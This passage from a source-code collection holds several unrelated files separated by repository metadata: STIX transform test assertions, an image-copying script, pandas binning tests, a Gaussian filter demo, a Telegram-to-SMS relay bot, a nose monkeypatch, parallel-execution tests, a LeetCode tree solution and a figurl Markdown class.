assert "ctime" in file_object and file_object['ctime'] == TIMESTAMP
assert "created" not in file_object
assert "mtime" in file_object and file_object['mtime'] == TIMESTAMP
assert "modified" not in file_object
assert "atime" in file_object and file_object['atime'] == TIMESTAMP
assert "accessed" not in file_object
assert "parent_directory_ref" in file_object
assert "hashes" in file_object
hashes = file_object["hashes"]
assert "MD5" in hashes and hashes["MD5"] == DATA["md5hash"]
assert "SHA-256" in hashes and hashes["SHA-256"] == DATA["sha256hash"]
assert "parent_directory_ref" in file_object
assert "id" in file_object and str(file_object['id']) == CYBOX_ID["file"]
# directory
directory_object = TestTransform.get_first_cybox_of_id_stix_2_1(result_bundle_objects, file_object["parent_directory_ref"])
assert directory_object, 'directory object type not found'
assert "path" in directory_object and directory_object["path"] == DATA["file_path"]
assert "ctime" in directory_object and directory_object['ctime'] == TIMESTAMP
assert "created" not in directory_object
assert "mtime" in directory_object and directory_object['mtime'] == TIMESTAMP
assert "modified" not in directory_object
assert "atime" in directory_object and directory_object['atime'] == TIMESTAMP
assert "accessed" not in directory_object
# process
process_object = TestTransform.get_first_of_type(result_bundle_objects, 'process')
assert process_object, 'process object type not found'
assert "name" not in process_object
assert "pid" in process_object and process_object['pid'] == DATA['process_id']
assert "arguments" in process_object and process_object['pid'] == DATA['process_id']
assert "created_time" in process_object and process_object['arguments'] == DATA['process_arguments']
assert "created" not in process_object
assert "image_ref" in process_object
assert "binary_ref" not in process_object
assert "id" in directory_object and str(directory_object['id']) == CYBOX_ID["directory"]
| 47.99322
| 136
| 0.670646
|
4a02173eb57545ab3b16c691d67beb7894399305
| 1,438
|
py
|
Python
|
scripts/sequential_tool.py
|
ripl-ttic/dense_visual_descriptors
|
64bd1eb40aa7be047fa2a4fa0d3973d4c4e42ca8
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/sequential_tool.py
|
ripl-ttic/dense_visual_descriptors
|
64bd1eb40aa7be047fa2a4fa0d3973d4c4e42ca8
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/sequential_tool.py
|
ripl-ttic/dense_visual_descriptors
|
64bd1eb40aa7be047fa2a4fa0d3973d4c4e42ca8
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import shutil
# Copy every '*rgb.*' frame from each scene's processed/images directory
# into a mirrored tree, renaming frames to a zero-padded sequence, and
# carry the two per-scene YAML files along.
input_dir = "/media/kudo/Elements/data/pdc/logs_proto"
output_dir = "/media/kudo/Elements/data/sequential_pdc/logs_proto"

d = input_dir
count = 0  # total RGB frames copied across all scenes
folders = [os.path.join(d, o) for o in os.listdir(d) if os.path.isdir(os.path.join(d, o))]
num_folders = len(folders)  # hoisted: was recomputed on every iteration
for folder_i, folder in enumerate(folders):
    print("working on {}/{} scene".format(folder_i+1, num_folders))
    image_dir = os.path.join(folder, "processed", "images")
    rel_path = os.path.relpath(image_dir, input_dir)
    output_image_dir = os.path.join(output_dir, rel_path)
    if not os.path.exists(output_image_dir):
        os.makedirs(output_image_dir)
    # keep only frames whose basename ends in 'rgb'
    rgb_lst = [filename for filename in os.listdir(image_dir) if filename.split('.')[0][-3:] == 'rgb']
    # BUG FIX: os.listdir order is arbitrary; sort so the "sequential"
    # indices assigned below follow filename order.
    rgb_lst.sort()
    for idx, image_file in enumerate(rgb_lst):
        # BUG FIX: the old 2-way unpack of split('.') crashed on names
        # containing more than one dot; take the final suffix instead.
        image_ext = image_file.split('.')[-1]
        src = os.path.join(image_dir, image_file)
        dest = os.path.join(output_image_dir, "{:06d}".format(idx) + '.' + image_ext)
        shutil.copyfile(src, dest)
        count += 1
    # copy yamls
    src = os.path.join(image_dir, "camera_info.yaml")
    dest = os.path.join(output_image_dir, "camera_info.yaml")
    shutil.copyfile(src, dest)
    src = os.path.join(image_dir, "pose_data.yaml")
    dest = os.path.join(output_image_dir, "pose_data.yaml")
    shutil.copyfile(src, dest)
print("The total number of rgb images copied is {}".format(count))
| 36.871795
| 100
| 0.684979
|
4a0218bef60013ce56a78a1dd1bed1af0b8e944b
| 8,863
|
py
|
Python
|
pandas/tools/tests/test_tile.py
|
certik/pandas
|
758ca05e2eb04532b5d78331ba87c291038e2c61
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | 29
|
2015-01-08T19:20:37.000Z
|
2021-04-20T08:25:56.000Z
|
pandas/tools/tests/test_tile.py
|
certik/pandas
|
758ca05e2eb04532b5d78331ba87c291038e2c61
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | 5
|
2021-03-19T08:36:48.000Z
|
2022-01-13T01:52:34.000Z
|
pandas/tools/tests/test_tile.py
|
certik/pandas
|
758ca05e2eb04532b5d78331ba87c291038e2c61
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | 17
|
2015-02-01T18:12:04.000Z
|
2020-06-15T14:13:04.000Z
|
import os
import nose
import numpy as np
from pandas.compat import zip
from pandas import DataFrame, Series, unique
import pandas.util.testing as tm
from pandas.util.testing import assertRaisesRegexp
import pandas.core.common as com
from pandas.core.algorithms import quantile
from pandas.tools.tile import cut, qcut
import pandas.tools.tile as tmod
from numpy.testing import assert_equal, assert_almost_equal
class TestCut(tm.TestCase):
    """Tests for pandas.tools.tile.cut / qcut (value and quantile binning).

    Written against the pre-1.0 pandas internals this module imports
    (pandas.core.common, pandas.tools.tile); label strings encode the
    interval-formatting behaviour of that era.
    """

    def test_simple(self):
        # labels=False returns integer bin codes instead of interval labels
        data = np.ones(5)
        result = cut(data, 4, labels=False)
        desired = [1, 1, 1, 1, 1]
        assert_equal(result, desired)

    def test_bins(self):
        data = np.array([.2, 1.4, 2.5, 6.2, 9.7, 2.1])
        result, bins = cut(data, 3, retbins=True)
        assert_equal(result.codes, [0, 0, 0, 1, 2, 0])
        # left edge is padded below the minimum so the first point is included
        assert_almost_equal(bins, [0.1905, 3.36666667, 6.53333333, 9.7])

    def test_right(self):
        data = np.array([.2, 1.4, 2.5, 6.2, 9.7, 2.1, 2.575])
        result, bins = cut(data, 4, right=True, retbins=True)
        assert_equal(result.codes, [0, 0, 0, 2, 3, 0, 0])
        assert_almost_equal(bins, [0.1905, 2.575, 4.95, 7.325, 9.7])

    def test_noright(self):
        data = np.array([.2, 1.4, 2.5, 6.2, 9.7, 2.1, 2.575])
        result, bins = cut(data, 4, right=False, retbins=True)
        assert_equal(result.codes, [0, 0, 0, 2, 3, 0, 1])
        assert_almost_equal(bins, [0.2, 2.575, 4.95, 7.325, 9.7095])

    def test_arraylike(self):
        # plain lists must work the same as ndarrays
        data = [.2, 1.4, 2.5, 6.2, 9.7, 2.1]
        result, bins = cut(data, 3, retbins=True)
        assert_equal(result.codes, [0, 0, 0, 1, 2, 0])
        assert_almost_equal(bins, [0.1905, 3.36666667, 6.53333333, 9.7])

    def test_bins_not_monotonic(self):
        data = [.2, 1.4, 2.5, 6.2, 9.7, 2.1]
        self.assertRaises(ValueError, cut, data, [0.1, 1.5, 1, 10])

    def test_wrong_num_labels(self):
        # 2 bins but 3 labels supplied
        data = [.2, 1.4, 2.5, 6.2, 9.7, 2.1]
        self.assertRaises(ValueError, cut, data, [0, 1, 10],
                          labels=['foo', 'bar', 'baz'])

    def test_cut_corner(self):
        # h3h
        self.assertRaises(ValueError, cut, [], 2)
        self.assertRaises(ValueError, cut, [1, 2, 3], 0.5)

    def test_cut_out_of_range_more(self):
        # #1511
        s = Series([0, -1, 0, 1, -3])
        ind = cut(s, [0, 1], labels=False)
        exp = [np.nan, np.nan, np.nan, 0, np.nan]
        assert_almost_equal(ind, exp)

    def test_labels(self):
        arr = np.tile(np.arange(0, 1.01, 0.1), 4)
        result, bins = cut(arr, 4, retbins=True)
        ex_levels = ['(-0.001, 0.25]', '(0.25, 0.5]', '(0.5, 0.75]',
                     '(0.75, 1]']
        self.assert_numpy_array_equal(result.categories, ex_levels)
        result, bins = cut(arr, 4, retbins=True, right=False)
        ex_levels = ['[0, 0.25)', '[0.25, 0.5)', '[0.5, 0.75)',
                     '[0.75, 1.001)']
        self.assert_numpy_array_equal(result.categories, ex_levels)

    def test_cut_pass_series_name_to_factor(self):
        s = Series(np.random.randn(100), name='foo')
        factor = cut(s, 4)
        self.assertEqual(factor.name, 'foo')

    def test_label_precision(self):
        arr = np.arange(0, 0.73, 0.01)
        result = cut(arr, 4, precision=2)
        ex_levels = ['(-0.00072, 0.18]', '(0.18, 0.36]', '(0.36, 0.54]',
                     '(0.54, 0.72]']
        self.assert_numpy_array_equal(result.categories, ex_levels)

    def test_na_handling(self):
        # NaN inputs must stay NaN in both labelled and coded outputs
        arr = np.arange(0, 0.75, 0.01)
        arr[::3] = np.nan
        result = cut(arr, 4)
        result_arr = np.asarray(result)
        ex_arr = np.where(com.isnull(arr), np.nan, result_arr)
        tm.assert_almost_equal(result_arr, ex_arr)
        result = cut(arr, 4, labels=False)
        ex_result = np.where(com.isnull(arr), np.nan, result)
        tm.assert_almost_equal(result, ex_result)

    def test_inf_handling(self):
        data = np.arange(6)
        data_ser = Series(data,dtype='int64')
        result = cut(data, [-np.inf, 2, 4, np.inf])
        result_ser = cut(data_ser, [-np.inf, 2, 4, np.inf])
        ex_categories = ['(-inf, 2]', '(2, 4]', '(4, inf]']
        np.testing.assert_array_equal(result.categories, ex_categories)
        np.testing.assert_array_equal(result_ser.cat.categories, ex_categories)
        self.assertEqual(result[5], '(4, inf]')
        self.assertEqual(result[0], '(-inf, 2]')
        self.assertEqual(result_ser[5], '(4, inf]')
        self.assertEqual(result_ser[0], '(-inf, 2]')

    def test_qcut(self):
        arr = np.random.randn(1000)
        labels, bins = qcut(arr, 4, retbins=True)
        ex_bins = quantile(arr, [0, .25, .5, .75, 1.])
        assert_almost_equal(bins, ex_bins)
        ex_levels = cut(arr, ex_bins, include_lowest=True)
        self.assert_numpy_array_equal(labels, ex_levels)

    def test_qcut_bounds(self):
        arr = np.random.randn(1000)
        factor = qcut(arr, 10, labels=False)
        self.assertEqual(len(np.unique(factor)), 10)

    def test_qcut_specify_quantiles(self):
        arr = np.random.randn(100)
        factor = qcut(arr, [0, .25, .5, .75, 1.])
        expected = qcut(arr, 4)
        self.assertTrue(factor.equals(expected))

    def test_qcut_all_bins_same(self):
        # identical values collapse every quantile edge -> must raise
        assertRaisesRegexp(ValueError, "edges.*unique", qcut, [0,0,0,0,0,0,0,0,0,0], 3)

    def test_cut_out_of_bounds(self):
        arr = np.random.randn(100)
        result = cut(arr, [-1, 0, 1])
        # code -1 marks values outside the given bins
        mask = result.codes == -1
        ex_mask = (arr < -1) | (arr > 1)
        self.assert_numpy_array_equal(mask, ex_mask)

    def test_cut_pass_labels(self):
        arr = [50, 5, 10, 15, 20, 30, 70]
        bins = [0, 25, 50, 100]
        labels = ['Small', 'Medium', 'Large']
        result = cut(arr, bins, labels=labels)
        exp = cut(arr, bins)
        exp.categories = labels
        self.assertTrue(result.equals(exp))

    def test_qcut_include_lowest(self):
        values = np.arange(10)
        cats = qcut(values, 4)
        ex_levels = ['[0, 2.25]', '(2.25, 4.5]', '(4.5, 6.75]', '(6.75, 9]']
        self.assertTrue((cats.categories == ex_levels).all())

    def test_qcut_nas(self):
        arr = np.random.randn(100)
        arr[:20] = np.nan
        result = qcut(arr, 4)
        self.assertTrue(com.isnull(result[:20]).all())

    def test_label_formatting(self):
        self.assertEqual(tmod._trim_zeros('1.000'), '1')
        # it works
        result = cut(np.arange(11.), 2)
        result = cut(np.arange(11.) / 1e10, 2)
        # #1979, negative numbers
        result = tmod._format_label(-117.9998, precision=3)
        self.assertEqual(result, '-118')
        result = tmod._format_label(117.9998, precision=3)
        self.assertEqual(result, '118')

    def test_qcut_binning_issues(self):
        # #1978, 1979
        path = os.path.join(curpath(), 'cut_data.csv')
        arr = np.loadtxt(path)
        result = qcut(arr, 20)
        starts = []
        ends = []
        for lev in result.categories:
            s, e = lev[1:-1].split(',')
            self.assertTrue(s != e)
            starts.append(float(s))
            ends.append(float(e))
        # consecutive bins must be strictly increasing and non-overlapping
        for (sp, sn), (ep, en) in zip(zip(starts[:-1], starts[1:]),
                                      zip(ends[:-1], ends[1:])):
            self.assertTrue(sp < sn)
            self.assertTrue(ep < en)
            self.assertTrue(ep <= sn)

    def test_cut_return_categorical(self):
        from pandas import Categorical
        s = Series([0,1,2,3,4,5,6,7,8])
        res = cut(s,3)
        exp = Series(Categorical.from_codes([0,0,0,1,1,1,2,2,2],
                     ["(-0.008, 2.667]", "(2.667, 5.333]", "(5.333, 8]"],
                     ordered=True))
        tm.assert_series_equal(res, exp)

    def test_qcut_return_categorical(self):
        from pandas import Categorical
        s = Series([0,1,2,3,4,5,6,7,8])
        res = qcut(s,[0,0.333,0.666,1])
        exp = Series(Categorical.from_codes([0,0,0,1,1,1,2,2,2],
                     ["[0, 2.664]", "(2.664, 5.328]", "(5.328, 8]"],
                     ordered=True))
        tm.assert_series_equal(res, exp)

    def test_series_retbins(self):
        # GH 8589
        s = Series(np.arange(4))
        result, bins = cut(s, 2, retbins=True)
        assert_equal(result.cat.codes.values, [0, 0, 1, 1])
        assert_almost_equal(bins, [-0.003, 1.5, 3])
        result, bins = qcut(s, 2, retbins=True)
        assert_equal(result.cat.codes.values, [0, 0, 1, 1])
        assert_almost_equal(bins, [0, 1.5, 3])
def curpath():
    """Return the absolute directory containing this test module."""
    return os.path.dirname(os.path.abspath(__file__))
# Allow running the module directly: delegate to nose with verbose output,
# stop at the first failure (-x), and drop into pdb on errors/failures.
if __name__ == '__main__':
    nose.runmodule(argv=[__file__, '-vvs', '-x', '--pdb', '--pdb-failure'],
                   exit=False)
| 32.704797
| 96
| 0.557937
|
4a0218fda4e5cb91090460b19f9ee3ce523f97a5
| 346
|
py
|
Python
|
Filters/gaussian.py
|
Joevaen/Scikit-image_On_CT
|
e3bf0eeadc50691041b4b7c44a19d07546a85001
|
[
"Apache-2.0"
] | null | null | null |
Filters/gaussian.py
|
Joevaen/Scikit-image_On_CT
|
e3bf0eeadc50691041b4b7c44a19d07546a85001
|
[
"Apache-2.0"
] | null | null | null |
Filters/gaussian.py
|
Joevaen/Scikit-image_On_CT
|
e3bf0eeadc50691041b4b7c44a19d07546a85001
|
[
"Apache-2.0"
] | null | null | null |
# Multi-dimensional Gaussian filter demo.  (comment translated from Chinese)
from skimage.filters import gaussian
from skimage import io, img_as_float

# NOTE(review): hard-coded local path; img_as_float is imported but unused.
image = io.imread('/home/qiao/PythonProjects/Scikit-image_On_CT/Test_Img/4.jpg')
io.imshow(image)
io.show()

# sigma = 0.1: barely perceptible smoothing
filtered_image = gaussian(image, 0.1)
io.imshow(filtered_image)
io.show()

# sigma = 0.6: visibly stronger smoothing
filtered_image = gaussian(image, 0.6)
io.imshow(filtered_image)
io.show()
| 19.222222
| 80
| 0.771676
|
4a0219f5c9224891f53fe061ce3bea640866aa11
| 5,188
|
py
|
Python
|
handler.py
|
qguv/serverless-telegram-bot
|
14bac01411b75402a09ee268ed83b8d0fc35f57e
|
[
"MIT"
] | null | null | null |
handler.py
|
qguv/serverless-telegram-bot
|
14bac01411b75402a09ee268ed83b8d0fc35f57e
|
[
"MIT"
] | null | null | null |
handler.py
|
qguv/serverless-telegram-bot
|
14bac01411b75402a09ee268ed83b8d0fc35f57e
|
[
"MIT"
] | null | null | null |
import json
import telegram
import os
import logging
import urllib.parse
import re
import requests
from base64 import b64decode
# Logging is cool!
# Reset any handlers AWS Lambda pre-installed, then configure our own.
logger = logging.getLogger()
if logger.handlers:
    for handler in logger.handlers:
        logger.removeHandler(handler)
logging.basicConfig(level=logging.INFO)

# Matches "<phone number>: <text>", e.g. "+15551234567: hello".
telno_re = re.compile(r'^(\+?[0-9]+): (.*)$')

# Canned API-Gateway/Lambda proxy responses.
OK_RESPONSE = {
    'statusCode': 200,
    'headers': {'Content-Type': 'application/json'},
    'body': json.dumps('ok')
}
ERROR_RESPONSE = {
    'statusCode': 400,
    'body': json.dumps('Oops, something went wrong!')
}
def configure_telegram():
    """Build a telegram.Bot from the TELEGRAM_TOKEN environment variable.

    Raises KeyError if the variable is unset.
    """
    token = os.environ['TELEGRAM_TOKEN']
    return telegram.Bot(token)
def webhook(event, context):
    """
    Runs the Telegram webhook.

    Handles one incoming update: notifies the configured chat about
    unauthorized senders, answers the /id command, and otherwise relays
    the message text as an SMS via send_sms().
    """
    try:
        CHAT_ID = int(os.environ['CHAT_ID'])
    except KeyError:
        # No chat restriction configured; only /id is serviced below.
        CHAT_ID = None
    bot = configure_telegram()
    logger.info('Telegram event: {}'.format(event))

    if event['requestContext']['http']['method'] == 'POST' and event['body']:
        logger.info('Telegram message received')
        update = telegram.Update.de_json(json.loads(event['body']), bot)

        # Forward a quoted copy of messages from any other chat to the
        # authorized chat, then stop processing.
        if CHAT_ID is not None and update.message.chat.id != CHAT_ID:
            err = "Unauthorized user '{}' just tried to send a message:"
            # BUG FIX: this read `msg.format(...)` but no `msg` exists in
            # this scope, so the unauthorized path crashed with NameError.
            err = err.format(update.message.from_user.username)
            err_mdv2 = mdv2_escape(err)
            quote_mdv2 = mdv2_escape(update.message.text)
            msg_mdv2 = "_{}_\n\n```\n{}\n```".format(err_mdv2, quote_mdv2)
            bot.send_message(chat_id=CHAT_ID, text=msg_mdv2, parse_mode=telegram.constants.PARSEMODE_MARKDOWN_V2)
            return OK_RESPONSE

        # Convenience command: report the chat id so CHAT_ID can be set.
        if update.message.text == '/id':
            update.message.reply_text(str(update.message.chat.id), quote=True)
            return OK_RESPONSE

        if CHAT_ID is None:
            return OK_RESPONSE

        telno, text = get_telno(update.message)
        if not telno:
            # No destination number found: show the expected format.
            msg_mdv2 = mdv2_escape(
                "Where should I send this? Reply to a previous message or begin the "
                "message with a phone number followed by a colon, e.g."
            )
            telno_mdv2 = mdv2_escape("+12003004000")
            text_mdv2 = mdv2_escape(text)
            update.message.reply_markdown_v2("_{}_\n\n```\n{}: {}\n```".format(msg_mdv2, telno_mdv2, text_mdv2), quote=True)
            return OK_RESPONSE

        send_sms(telno, text)
        logger.info('Message sent to {}: {}'.format(update.message.chat.id, text))
        update.message.reply_markdown_v2('_sent_', quote=True, disable_notification=True)
        return OK_RESPONSE

    return ERROR_RESPONSE
def set_webhook(event, context):
    """Register this deployment's public URL as the Telegram webhook."""
    PATH_TOKEN = os.environ['PATH_TOKEN']
    logger.info('Setup event: {}'.format(event))
    bot = configure_telegram()
    host = event.get('headers').get('host')
    url = 'https://{}/{}/tg'.format(host, PATH_TOKEN)
    logger.info('Setting telegram webhook URL to: {}'.format(url))
    # bot.set_webhook returns truthy on success
    return OK_RESPONSE if bot.set_webhook(url) else ERROR_RESPONSE
def plivo_webhook(event, context):
    """Receive an inbound SMS from Plivo and forward it to Telegram."""
    CHAT_ID = int(os.environ['CHAT_ID'])
    bot = configure_telegram()
    logger.info('Plivo Event: {}'.format(event))
    try:
        body = parse_plivo_msg(event)
    except AssertionError as e:
        # parse_plivo_msg signals a malformed request via AssertionError
        logger.info(e)
        return ERROR_RESPONSE
    text = "{}: {}".format(body['From'], body['Text'])
    bot.send_message(chat_id=CHAT_ID, text=text)
    logger.info('Message sent')
    return OK_RESPONSE
def parse_plivo_msg(event):
    """Decode a Plivo POST body into a {field: stripped value} dict.

    Raises AssertionError for non-POST or empty-body events; the caller
    deliberately catches that and returns a 400.
    """
    assert event['requestContext']['http']['method'] == 'POST'
    assert event['body']
    logger.info('Plivo message received')
    raw = event['body']
    if event['isBase64Encoded']:
        raw = b64decode(raw).decode('utf-8')
    fields = urllib.parse.parse_qs(raw)
    return {name: values[0].strip() for name, values in fields.items()}
def get_telno(message):
    """Extract a (telno, text) pair from a Telegram message.

    The number comes from a "<telno>: <text>" prefix in the message
    itself, or from the message this one replies to; telno is None when
    neither provides one.
    """
    match = telno_re.match(message.text)
    if match:
        return match.group(1), match.group(2)
    # fall back to the number in the message being replied to
    antecedent = message.reply_to_message
    if antecedent:
        match = telno_re.match(antecedent.text)
        if match:
            return match.group(1), message.text
    return None, message.text
def mdv2_escape(text):
    """Backslash-escape every character Telegram MarkdownV2 treats as special."""
    specials = '_*[]()~`>#+-=|{}.!'
    return ''.join('\\' + ch if ch in specials else ch for ch in text)
def send_sms(dest, text):
    """POST one outbound SMS to the Plivo Message API.

    Credentials and the source number come from the TELNO / PLIVO_ID /
    PLIVO_TOKEN environment variables; the response is not checked.
    """
    TELNO = os.environ['TELNO']
    PLIVO_ID = os.environ['PLIVO_ID']
    PLIVO_TOKEN = os.environ['PLIVO_TOKEN']
    endpoint = "https://api.plivo.com/v1/Account/{}/Message/".format(PLIVO_ID)
    payload = {
        "src": TELNO,
        "dst": dest,
        "text": text,
    }
    logger.info('Sending SMS from {} to {}: {}'.format(TELNO, dest, text))
    requests.post(endpoint, auth=(PLIVO_ID, PLIVO_TOKEN), json=payload)
| 26.070352
| 124
| 0.621049
|
4a021a5351707c9ab786d769ee31ae01a4668e76
| 2,037
|
py
|
Python
|
nipy/testing/nosepatch.py
|
arokem/nipy
|
d6b2e862c65558bb5747c36140fd6261a7e1ecfe
|
[
"BSD-3-Clause"
] | 1
|
2016-03-08T15:01:06.000Z
|
2016-03-08T15:01:06.000Z
|
nipy/testing/nosepatch.py
|
fabianp/nipy
|
40e89f3ca7f34df05631623807993026134e6de3
|
[
"BSD-3-Clause"
] | 1
|
2015-09-09T07:49:57.000Z
|
2015-09-25T01:50:40.000Z
|
nipy/testing/nosepatch.py
|
fabianp/nipy
|
40e89f3ca7f34df05631623807993026134e6de3
|
[
"BSD-3-Clause"
] | null | null | null |
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""Monkeypatch nose to accept any callable as a method.
By default, nose's ismethod() fails for static methods.
Once this is fixed in upstream nose we can disable it.
Note: merely importing this module causes the monkeypatch to be applied."""
import unittest
import nose.loader
from inspect import ismethod, isfunction
def getTestCaseNames(self, testCaseClass):
    """Override to select with selector, unless
    config.getTestCaseNamesCompat is True
    """
    # Compatibility mode: defer entirely to unittest's own discovery.
    if self.config.getTestCaseNamesCompat:
        return unittest.TestLoader.getTestCaseNames(self, testCaseClass)

    def wanted(attr, cls=testCaseClass, sel=self.selector):
        # Decide whether attribute *attr* of the test class is a test case.
        item = getattr(cls, attr, None)
        # MONKEYPATCH: replace this:
        #if not ismethod(item):
        # return False
        # return sel.wantMethod(item)
        # With:
        if ismethod(item):
            return sel.wantMethod(item)
        # static method or something. If this is a static method, we
        # can't get the class information, and we have to treat it
        # as a function. Thus, we will miss things like class
        # attributes for test selection
        if isfunction(item):
            return sel.wantFunction(item)
        return False
        # END MONKEYPATCH

    # NOTE(review): Python-2-era code — under Python 3, filter() returns an
    # iterator (so .append below would fail) and list.sort() no longer takes
    # a bare cmp function. Left untouched; this module targets the old
    # nose/py2 toolchain.
    cases = filter(wanted, dir(testCaseClass))
    # include inherited test names not already selected
    for base in testCaseClass.__bases__:
        for case in self.getTestCaseNames(base):
            if case not in cases:
                cases.append(case)
    # add runTest if nothing else picked
    if not cases and hasattr(testCaseClass, 'runTest'):
        cases = ['runTest']
    if self.sortTestMethodsUsing:
        cases.sort(self.sortTestMethodsUsing)
    return cases
##########################################################################
# Apply monkeypatch here
# Importing this module installs the patched discovery on nose's loader.
nose.loader.TestLoader.getTestCaseNames = getTestCaseNames
##########################################################################
| 36.375
| 75
| 0.62543
|
4a021cca467b73639e501f8ce8c417a2b0b223ef
| 2,178
|
py
|
Python
|
tests/test_parallel.py
|
benzatti/parallel
|
d5f44d53fc2633fe554fa6266e36c00ef6939d57
|
[
"MIT"
] | null | null | null |
tests/test_parallel.py
|
benzatti/parallel
|
d5f44d53fc2633fe554fa6266e36c00ef6939d57
|
[
"MIT"
] | 6
|
2022-03-10T04:31:07.000Z
|
2022-03-13T20:37:58.000Z
|
tests/test_parallel.py
|
benzatti/parallel
|
d5f44d53fc2633fe554fa6266e36c00ef6939d57
|
[
"MIT"
] | null | null | null |
from parallel import Parallel
import threading
import pytest
class Counter:
    """A thread-safe integer counter used as a fixture by the tests below."""

    def __init__(self, initial_value):
        self.lock = threading.RLock()
        self.counter = initial_value

    def increment(self):
        """Atomically add one (delegates to add; the RLock is reentrant)."""
        self.add(1)

    def add(self, x):
        """Atomically add *x* to the counter."""
        with self.lock:
            self.counter += x

    def get_value(self):
        """Return the current count."""
        return self.counter
def test_parallel_invoke():
    """invoke() must run each supplied callable exactly once."""
    # Arrange
    counter = Counter(0)
    # Act — bound methods are callables, no lambdas required
    Parallel.invoke(counter.increment, counter.increment, counter.increment)
    # Assert
    assert counter.get_value() == 3
def test_parallel_for_range():
    """for_range() must pass every integer in [start, stop) to the callback."""
    # Arrange
    counter = Counter(0)
    # Act
    Parallel.for_range(start=0, stop=10, invoke=counter.add)
    # Assert: 0 + 1 + ... + 9
    assert counter.get_value() == 45
def test_parallel_for_each():
    """for_each() must pass every item of the iterable to the callback."""
    # Arrange
    counter = Counter(0)
    # Act
    Parallel.for_each(items=[1, 2, 3, 4], invoke=counter.add)
    # Assert: 1 + 2 + 3 + 4
    assert counter.get_value() == 10
def test_parallel_tasks():
    """Tasks must run concurrently: events force completion order
    one -> three -> two, which deadlocks if invoke() ran them serially."""
    # Arrange
    resume_task_two = threading.Event()
    resume_task_three = threading.Event()
    end_of_test = threading.Event()
    results = []

    def task_one():
        # Runs immediately, then unblocks task_three.
        results.append("one")
        resume_task_three.set()

    def task_two():
        # Waits until task_three has finished.
        resume_task_two.wait()
        results.append("two")
        end_of_test.set()

    def task_three():
        # Waits for task_one, then unblocks task_two.
        resume_task_three.wait()
        results.append("three")
        resume_task_two.set()

    # Act
    Parallel.invoke(
        task_one,
        task_two,
        task_three,
    )
    end_of_test.wait()
    # Assert
    assert ["one", "three", "two"] == results
def test_parallel_invoke_empty_arguments():
    # Calling invoke() with nothing to run is a usage error.
    with pytest.raises(ValueError):
        Parallel.invoke()


def test_parallel_for_each_with_invalid_arguments():
    # A non-iterable items argument must be rejected.
    with pytest.raises(TypeError):
        Parallel.for_each(None, None)


def test_parallel_for_range_with_invalid_arguments():
    # Non-integer bounds must be rejected.
    with pytest.raises(TypeError):
        Parallel.for_range(None, None, None)
| 19.105263
| 53
| 0.61157
|
4a021d32e1abdaecb1ba2595eaffdaabf68200b8
| 1,245
|
py
|
Python
|
python/113_path_sum_ii.py
|
ufjfeng/leetcode-soln
|
cbf2db0d81d5ef98f48c8d1df486559f89142bfd
|
[
"MIT"
] | null | null | null |
python/113_path_sum_ii.py
|
ufjfeng/leetcode-soln
|
cbf2db0d81d5ef98f48c8d1df486559f89142bfd
|
[
"MIT"
] | null | null | null |
python/113_path_sum_ii.py
|
ufjfeng/leetcode-soln
|
cbf2db0d81d5ef98f48c8d1df486559f89142bfd
|
[
"MIT"
] | 1
|
2019-11-22T19:28:11.000Z
|
2019-11-22T19:28:11.000Z
|
"""
Given a binary tree and a sum, find all root-to-leaf paths where each path's sum
equals the given sum.
For example:
Given the below binary tree and sum = 22,
5
/ \
4 8
/ / \
11 13 4
/ \ / \
7 2 5 1
return
[
[5,4,11,2],
[5,8,4,5]
]
"""
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    def pathSum(self, root, psum):
        """
        Return every root-to-leaf path whose node values sum to psum.

        :type root: TreeNode
        :type psum: int
        :rtype: List[List[int]]
        """
        if root is None:
            return []
        self.solns = []
        self.dfs(root, psum, [])
        return self.solns

    def dfs(self, root, psum, soln):
        """Depth-first walk; record the path when a matching leaf is hit."""
        if root.left is None and root.right is None:
            # Leaf: the remaining target must equal this node's value.
            if psum == root.val:
                self.solns.append(soln + [root.val])
            return
        remaining = psum - root.val
        extended = soln + [root.val]
        if root.left:
            self.dfs(root.left, remaining, extended)
        if root.right:
            self.dfs(root.right, remaining, extended)
| 24.411765
| 80
| 0.469076
|
4a021d401bb0b12b97dc34a8e28e2b292128fef3
| 234
|
py
|
Python
|
python/figurl/plugins/builtin/markdown/Markdown.py
|
magland/figurl
|
f254fb72cc23d95c5d53f8829d70e4621162c7f7
|
[
"Apache-2.0"
] | 2
|
2021-12-03T14:29:01.000Z
|
2022-01-28T16:07:49.000Z
|
python/figurl/plugins/builtin/markdown/Markdown.py
|
magland/figurl
|
f254fb72cc23d95c5d53f8829d70e4621162c7f7
|
[
"Apache-2.0"
] | 21
|
2021-08-31T19:56:34.000Z
|
2021-12-08T17:14:17.000Z
|
python/figurl/plugins/builtin/markdown/Markdown.py
|
magland/figurl
|
f254fb72cc23d95c5d53f8829d70e4621162c7f7
|
[
"Apache-2.0"
] | null | null | null |
from typing import List
from figurl.core.Figure import Figure
class Markdown(Figure):
    """A figurl figure that renders a Markdown source string."""

    def __init__(self, source: str):
        # 'Markdown.1' is the figurl view type; data carries the raw text.
        super().__init__(type='Markdown.1', data={'source': source})
| 26
| 54
| 0.619658
|
4a021e74fc9833babfd5183896f1ecacc698cad5
| 15,149
|
py
|
Python
|
2019Day11Part1.py
|
BenWichser/Advent_of_code_2019_day1_part1
|
61c0fe0461f06a85ec02c54cd8d61bdde54d37c7
|
[
"MIT"
] | null | null | null |
2019Day11Part1.py
|
BenWichser/Advent_of_code_2019_day1_part1
|
61c0fe0461f06a85ec02c54cd8d61bdde54d37c7
|
[
"MIT"
] | null | null | null |
2019Day11Part1.py
|
BenWichser/Advent_of_code_2019_day1_part1
|
61c0fe0461f06a85ec02c54cd8d61bdde54d37c7
|
[
"MIT"
] | null | null | null |
# Author: Ben Wichser
# Date: 12/11/2019
# Description: Paint the spaceship. How many sectors are painted? see www.adventofcode.com/2019 (day 11) for more information
